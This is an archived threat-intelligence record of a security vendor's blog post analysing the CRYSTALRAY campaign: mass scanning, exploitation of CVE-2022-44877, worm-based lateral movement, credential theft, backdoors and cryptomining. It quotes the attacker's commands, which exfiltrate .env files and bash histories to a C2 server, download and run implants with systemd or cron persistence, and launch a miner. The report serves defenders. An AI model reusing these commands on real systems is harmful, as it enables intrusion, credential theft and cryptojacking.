{
	"id": "f804eec4-7fc9-43b1-97b0-1518c3a045ab",
	"created_at": "2026-04-06T00:19:26.404803Z",
	"updated_at": "2026-04-10T13:11:41.642872Z",
	"deleted_at": null,
	"sha1_hash": "b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef",
	"title": "CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2698780,
	"plain_text": "CRYSTALRAY: Inside the Operations of a Rising Threat Actor\r\nExploiting OSS Tools\r\nBy Miguel Hernández\r\nPublished: 2024-07-11 · Archived: 2026-04-05 12:47:43 UTC\r\nThe Sysdig Threat Research Team (TRT) continued observation of the SSH-Snake threat actor we first identified\r\nin February 2024. New discoveries showed that the threat actor behind the initial attack expanded its operations\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 1 of 17\n\ngreatly, justifying an identifier to further track and report on the actor and campaigns: CRYSTALRAY. This actor\r\npreviously leveraged the SSH-Snake open source software (OSS) penetration testing tool during a campaign\r\nexploiting Confluence vulnerabilities.\r\nThe team's latest observations show that CRYSTALRAY's operations have scaled 10x to over 1,500 victims and\r\nnow include mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple OSS\r\nsecurity tools.\r\nCRYSTALRAY's motivations are to collect and sell credentials, deploy cryptominers, and maintain persistence in\r\nvictim environments. 
Some of the OSS tools the threat actor is leveraging include zmap, asn, httpx, nuclei,\r\nplatypus, and SSH-Snake.\r\nReleased on 4 January 2024, SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a\r\ncompromised system to start spreading itself throughout the network.\r\nThe worm automatically searches through known credential locations and shell history files to determine its next\r\nmove.\r\nBy avoiding the easily detectable patterns associated with scripted attacks, the tool provides greater stealth,\r\nflexibility, configurability and more comprehensive credential discovery than typical SSH worms, therefore being\r\nmore efficient and successful.\r\nTechnical Analysis\r\nInitial Access\r\nTo gain access to its targets, CRYSTALRAY prefers to leverage existing vulnerability proof of concepts which\r\nthey modify for their payload. Using the previously gathered list of targets, they perform checks to verify that\r\nthose potential victims are vulnerable to the exploit they plan to use. 
The following commands are an example of\r\nhow CRYSTALRAY conducts this process:\r\n# Services vulnerable on port 2031\r\ncat port_2031_httpx.txt | nuclei -s critical -tags centos -bs 500 -c 2 -rl 100000 -o 2031_nuclei.txt -stats -si\r\n# Generate simple code to test the vulnerability\r\necho \"curl ip.me\" | base64\r\ncurl -X POST \"https://\u003cvictim-IP\u003e:2031/login/index.php?login=$(echo${IFS}Y3VybCBpcC5tZQo=${IFS}|${IFS}base64${IF\r\n# Get the exploit from GitHub and run it to the victim\r\ngit clone https://github.com/Chocapikk/CVE-2022-44877\r\ncd CVE-2022-44877\r\nchmod +x script.sh\r\n./script.sh scan \u003cvictim-IP\u003e:2031\r\n# Modify the script and upload it to their automation system.\r\nnano script.sh\r\nAt the very end, CRYSTALRAY edits the downloaded exploit in order to add the malicious payload, which is\r\noften a Platypus or Sliver client. This process is very similar to the other exploits they leverage, all taking\r\nadvantage of OSS tools and proof of concepts.\r\nLateral Movement\r\nTo impact as many resources as possible, attackers commonly conduct lateral movement once they achieve remote\r\ncode execution (RCE). In this section, we will detail the tools and tactics CRYSTALRAY has successfully used to\r\nmove laterally through victims' environments.\r\nSSH-SNAKE\r\nTRT has already reported on CRYSTALRAY's use of the OSS penetration testing tool SSH-SNAKE (two months\r\nafter its release). SSH-SNAKE is a worm that uses SSH keys and credentials it discovers to propagate to new\r\nsystems and repeat its processes. 
All the while, SSH-Snake sends captured keys and bash histories back to its C2\r\nserver.\r\nCRYSTALRAY ran the following command to send the results from victims to their C2:\r\nif command -v curl \u003e/dev/null 2\u003e\u00261; then curl --max-time 100 https://raw.githubusercontent.com/MegaManSec/SSH-S\r\nThe image below is an example of SSH keys identified in the output of the SSH-Snake tool:\r\nCollection / Credential Access\r\nEnvironment Credentials\r\nAttackers don't just want to move between servers accessible via SSH. TRT discovered that CRYSTALRAY tried\r\nto move to other platforms, such as cloud providers. Attackers are looking for credentials in environment\r\nvariables, as TRT also reported in SCARLETEEL, to exponentially grow their impact. This credential discovery\r\nprocess is automatically performed on all devices to which the attacker gains access. The following commands are\r\nthe way that attackers are getting the credentials and uploading them:\r\ntmp=$(find / -type f -name \"*.env\" -o -name \"*.env.bak\" -o -name \"*config.env\" -o -name \"*.env.dist\" -o -name \"\r\nexe=$(bash cmd.sh \u003e \u003cenv_variables\u003e.txt)\r\npath=$(find / -type f -name env_variables.txt | grep -v 'Permission denied')\r\nid=$(curl -4 ip.me)\r\ncurl --upload-file $path \u003cC2_server\u003e/${id}_env_variables.txt\r\nrm -f cmd.sh env_variables.txt tmp.txt\r\nThe attackers use them in the future or sell them on black markets, such as Telegram, where the credentials found\r\nare sold in bulk.\r\nHistory Files\r\nBash command histories provide valuable information, but their extraction is not common among attackers\r\nbecause it is hard to process automatically. 
CRYSTALRAY uses two repositories to speed up this discovery of\r\nsensitive information hosted on the system. These are:\r\nall-bash-history\r\nlinux-smart-enumeration\r\nIn this case, we know that it was extracted and stored on CRYSTALRAY's servers, likely to analyze or search for\r\nmore credentials or tokens that may arise from the data collected.\r\nif command -v curl \u003e/dev/null 2\u003e\u00261; then\r\n tmpfile=$(mktemp -p /tmp); find / -name .bash_history -exec cat {} + 2\u003e/dev/null \u003e \"$tmpfile\" ; if [ -s \"$tm\r\nfi\r\nIn the data collected previously during the original SSH-SNAKE investigation, we found 100 command histories. This\r\nnumber has expanded to more than 300 at the time of this report.\r\nCommand and Control / Persistence\r\nMaintaining access to compromised systems is often a priority for attackers. This is a common practice that TRT\r\nhas reported on twice before:\r\nRUBYCARP is a recent case where it used IRC servers for both internal and botnet communications. It\r\nwas focused on phishing campaigns and brute force attacks.\r\nRebirthltd was based on a modified Mirai binary. It attacked gaming servers and used Telegram as a base of\r\noperations and to sell its services.\r\nSliver\r\nSpotted within their injection scripts, TRT discovered a script built to execute a strange payload. During analysis,\r\nresearchers found that this binary is a payload generated with Sliver. Sliver is an open source cross-platform\r\nadversary emulation/red team framework that can be used by organizations of all sizes to perform security testing.\r\nSliver's implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS, and are dynamically\r\ncompiled with per-binary asymmetric encryption keys.\r\necho \"hostctl\"\r\nif [ ! 
-f /tmp/hostctld ]; then\r\n download_file \"\u003cc2_server\u003e/hostctld\" \"/tmp/hostctld\"\r\n sleep 1\r\n chmod +x /tmp/hostctld\r\n nohup /tmp/hostctld \u003e/dev/null 2\u003e\u00261 \u0026\r\nfi\r\nif ! pgrep -f /tmp/hostctld \u003e /dev/null; then\r\n nohup /tmp/hostctld \u003e/dev/null 2\u003e\u00261 \u0026\r\nfi\r\nif [ \"$(id -u)\" -eq 0 ]; then\r\n if command -v systemctl \u0026\u003e/dev/null; then\r\n systemctl stop ext4; systemctl disable ext4; systemctl stop sshb; systemctl disable sshb\r\n echo \"User is root and systemctl is installed.\"\r\n curl -v --user \"\u003ccreds\u003e\" \u003cc2_server\u003e/hostctld --output /usr/bin/hostctld \u0026\u0026 chmod +x /usr/bin/hostctld \u0026\r\n echo -e \"[Unit]\\nDescription=Host Control Daemon\\n\\n[Service]\\nExecStart=/usr/bin/hostctld\\nRestart=alwa\r\nCRYSTALRAY runs the binary to maintain access to the system and connect to a specific port on the C2 server.\r\nBasically, it logs victims once they have been successfully exploited.\r\nThe actor also hosted two other payloads that have the same purpose – db.exe , similar to the previous one, and\r\nlinux_agent , created with the pentester tool emp3r0r, a post-exploitation framework for Linux/Windows – but\r\nTRT has not discovered if they have been used. All the IoCs are reported here.\r\nPlatypus\r\nResearchers discovered the dashboard CRYSTALRAY used to manage their victims based on an open source tool\r\ncalled Platypus, a modern multiple reverse shell sessions/clients web-based manager written in Go. The installation\r\nis quite simple. Below is an example running the binary of the latest version. In the following image, we can see\r\nthe output:\r\nPlatypus was previously reported in a cryptomining operation. TRT found more Platypus dashboards using Shodan\r\nand Censys Internet mapping services. 
By querying the default dashboard port, 7331, and ports 13338 and 13339,\r\nwhich are used to manage reverse shell connections, researchers were able to locate more instances of Platypus.\r\nDefault ports can be changed, so there are likely more out there.\r\nCensys Dashboard\r\nCRYSTALRAY ran Platypus on their server. Their dashboard has reset several times because it is an active\r\ncampaign and the number of victims varies from 100 to 400 based on uptime. This is a screenshot of the\r\ndashboard:\r\nPlatypus Dashboard\r\nCRYSTALRAY's victims are added to the C2 using the following commands (below). It is also interesting to see\r\nhow they look for a directory that they have write permission for.\r\nwritable_dir=$(find / -type d \\( -writable -a ! -path \"/tmp\" -a ! -path \"/tmp/*\" \\) -print -quit 2\u003e/dev/null)\r\ncd $writable_dir \u0026\u0026 curl -fsSL http://\u003cc2_server\u003e:13339/termite/\u003cc2_server\u003e:19951 -o wt \u0026\u0026 chmod +x wt \u0026\u0026 nohup\r\nwritable_dir_2=$(find /var -type d \\( -writable -a ! -path \"/tmp\" -a ! -path \"/tmp/*\" \\) -print -quit 2\u003e/dev/nul\r\ncd $writable_dir_2 \u0026\u0026 wget -q http://\u003cc2_server\u003e/termite/\u003cc2_server\u003e:44521 -O .sys \u0026\u0026 chmod +x .sys \u0026\u0026 nohup ./.\r\nwritable_dir_3=$(find /home -type d \\( -writable -a ! -path \"/tmp\" -a ! -path \"/tmp/*\" \\) -print -quit 2\u003e/dev/nu\r\ncd $writable_dir_3 \u0026\u0026 wget -q http://\u003cc2_server\u003e:13339/termite/\u003cc2_server\u003e:13337 -O netd \u0026\u0026 chmod +x netd \u0026\u0026 noh\r\nImpact of CRYSTALRAY\r\nSelling Credentials\r\nAs mentioned before, CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which\r\nare then sold on black markets for thousands of dollars. 
The credentials being sold involve a multitude of services,\r\nincluding Cloud Service Providers and SaaS email providers.  \r\nThe raw data stolen from compromised hosts is stored in files on the attacker's C2 server. Below is an example of\r\na list of files. The filename starts with the IP address of the victim.\r\nAs TRT found through CRYSTALRAY's cryptomining activities, the attackers use an email address:\r\ncontact4restore@airmail[.]cc. Using contact4restore, researchers searched for other related accounts and found\r\ncontact4restore@proton[.]me.\r\nCryptomining\r\nAs is typical in cloud attacks, once the attackers have access, they try to use victim resources for financial gain.\r\nCRYSTALRAY has two associated cryptominers. 
One looks older and does not hide much and the other is more\r\nsophisticated, with the pool to which it was connecting hosted on the same C2 server.\r\nThe old script contains the following content to add the script to the crontab and download and run the miner.\r\ncrontab -r\r\n(crontab -l 2\u003e/dev/null; echo \"* * * * * curl -v --user 'qwerty:abc123' \u003cc2_server\u003e/lr/rotate --output /tmp/rota\r\ncurl -v --user '\u003ccreds\u003e' \u003cc2_server\u003e/lr/lr_linux --output /tmp/logrotate \u0026\u0026 chmod +x /tmp/logrotate\r\n /tmp/logrotate -o 51.222.12.201:10900 -u ZEPHYR3LgJXAXUmG23rRkN8LAALmt78re3a8PhWnnw5x8EZ5oEStbUuAWvyHnVUWL6E\r\nThe wallet found is connected to nanopool, and some of the workers that match the scripts are connected.\r\nThey are mining approximately $200/month.\r\nIn a new script used in attacks over the course of April and May, CRYSTALRAY used a handcrafted config file\r\nwith the pools hosted in the same server used to store the results or host the command and control. In this case,\r\nTRT was unable to check balances or wallets associated with their operations.\r\ncat \u003e /usr/bin/config.json \u003c\u003cEOF\r\n{\r\n \"autosave\": true,\r\n \"cpu\": {\r\n \"enabled\": true,\r\n \"huge-pages\": true,\r\n \"yield\": true,\r\n \"max-threads-hint\": 100\r\n },\r\n \"opencl\": false,\r\n \"cuda\": false,\r\n \"randomx\": {\r\n \"init\": -1,\r\n \"init-avx2\": -1,\r\n \"mode\": \"auto\",\r\n \"1gb-pages\": true,\r\n \"rdmsr\": true,\r\n \"wrmsr\": true,\r\n \"cache_qos\": false,\r\n \"numa\": true,\r\n \"scratchpad_prefetch_mode\": 1\r\n },\r\n \"pools\": [\r\n {\r\n \"url\": \"\u003cc2_server\u003e:3333\"\r\n },\r\n {\r\n \"url\": \"\u003cc2_server\u003e:3333\"\r\n }\r\n ]\r\n}\r\nEOF\r\nif ! 
pgrep -x \"logrotate\" \u003e /dev/null\r\nthen\r\n # The process is not running, execute your commands here\r\n echo \"logrotate is not running. Executing commands...\"\r\n # Replace the following line with the commands you want to execute\r\n curl -v --user '\u003ccreds\u003e' \u003cc2_server\u003e/lr/lr_linux --output /tmp/logrotate \u0026\u0026 chmod +x /tmp/logrotate\r\n /tmp/logrotate -o \u003cc2_server\u003e:3333 --background --cpu-no-yield\r\ncurl -v --user '\u003ccreds\u003e' \u003cc2_server\u003e/lr_linux --output /usr/bin/log_rotate \u0026\u0026 chmod +x /usr/bin/log_rotate \u0026\u0026 ch\r\n echo -e \"[Unit]\\nDescription=Host Control Daemon\\n\\n[Service]\\nExecStart=/usr/bin/log_rotate\\nRestart=al\r\nKill Competitor Processes\r\nCRYSTALRAY also has a script to remove other cryptominers that victims may already have running. This is a\r\ncommon tactic used by attackers to make sure they have sole use of all of the victims' resources. Since many\r\nattackers are covering the same attack surfaces, they are likely to come across previously compromised systems.\r\nRecommendations\r\nCRYSTALRAY's operations prove how easily an attacker can maintain and control access to victim networks\r\nusing only open source and penetration testing tools. Therefore, implementing detection and prevention measures\r\nto withstand attacker persistence is necessary.\r\nThe first step to avoid the vast majority of these automated attacks is to reduce the attack surface through\r\nvulnerability, identity, and secrets management. CRYSTALRAY is only one instance, but TRT is seeing automated\r\ncloud attacks more often.\r\nIf it is necessary to expose your applications to the Internet, they may be vulnerable at some point. 
Therefore,\r\norganizations must prioritize vulnerability remediation to reduce the risk of their exposure.\r\nFinally, it is necessary to have cameras/runtime detection that enables you to know — at any moment — if you\r\nhave been successfully attacked, to take remedial action, and to perform a more thorough forensic analysis and\r\nsolve the root cause.\r\nConclusion\r\nCRYSTALRAY is a new threat actor who prefers to use multiple OSS tools to perform widespread vulnerability\r\nscanning and exploitation. Once they gain access, they install one of several backdoors to keep control of the\r\ntarget. SSH-snake is then used to spread throughout a victim's network and collect credentials to sell.\r\nCryptominers are also deployed to gain further monetary value from the compromised assets.\r\nSource: https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/"
	],
	"report_names": [
		"crystalray-rising-threat-actor-exploiting-oss-tools"
	],
	"threat_actors": [
		{
			"id": "30ad968f-0645-433e-ae9a-40785fc72921",
			"created_at": "2024-04-19T02:00:03.628112Z",
			"updated_at": "2026-04-10T02:00:03.616986Z",
			"deleted_at": null,
			"main_name": "RUBYCARP",
			"aliases": [],
			"source_name": "MISPGALAXY:RUBYCARP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c220fe19-ef23-4166-ac54-7a32c3ea75d7",
			"created_at": "2023-11-10T02:00:07.503009Z",
			"updated_at": "2026-04-10T02:00:03.437555Z",
			"deleted_at": null,
			"main_name": "SCARLETEEL",
			"aliases": [],
			"source_name": "MISPGALAXY:SCARLETEEL",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "97fe3aab-8c16-4c4a-afa0-d92e9cf44788",
			"created_at": "2024-07-17T02:00:04.182085Z",
			"updated_at": "2026-04-10T02:00:03.67316Z",
			"deleted_at": null,
			"main_name": "CRYSTALRAY",
			"aliases": [],
			"source_name": "MISPGALAXY:CRYSTALRAY",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434766,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef.pdf",
		"text": "https://archive.orkl.eu/b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef.txt",
		"img": "https://archive.orkl.eu/b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef.jpg"
	}
}